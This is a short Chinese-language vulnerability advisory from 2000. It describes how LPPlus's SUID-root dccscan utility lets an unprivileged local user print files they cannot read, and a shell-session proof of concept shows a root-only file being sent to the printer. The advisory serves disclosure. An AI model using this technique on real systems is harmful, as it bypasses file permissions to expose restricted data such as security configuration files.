LPPlus dccscan 可以读没有读权利的文件发布时间:2000-04-17 更新时间:2000-04-17 严重程度:高 威胁程度:读取受限文件 错误类型:设计错误 利用方式:服务器模式 受影响系统 Plus Technologies LPPlus 3.3,3.2.2详细描述 $LPHOME/bin/dccscan是一个SUID-ROOT程序,可以由任意用户来执行,它可能导致 一个没有权利的用户打印原来他不能读的文件。经过测试,可以使打印机打印LPPlus 的安全配置文件。 测试代码 # id uid=0(root) gid=1(other) # ls -alt /root/test total 6 drwx------ 2 root other 512 Sep 5 17:46 . -r-------- 1 root other 365 Sep 5 17:46 foo drwx------ 3 root other 512 Sep 5 17:46 .. # su - test Sun Microsystems Inc. SunOS 5.6 Generic August 1997 $ id uid=600(test) gid=300(users) $ ls -alt /root/test /root/test: Permission denied $ dccscan /root/test 30 5 "-dlp0" $ # 现在你可以去打印机那里等待文件输出。 解决方案 尚无 相关信息 |
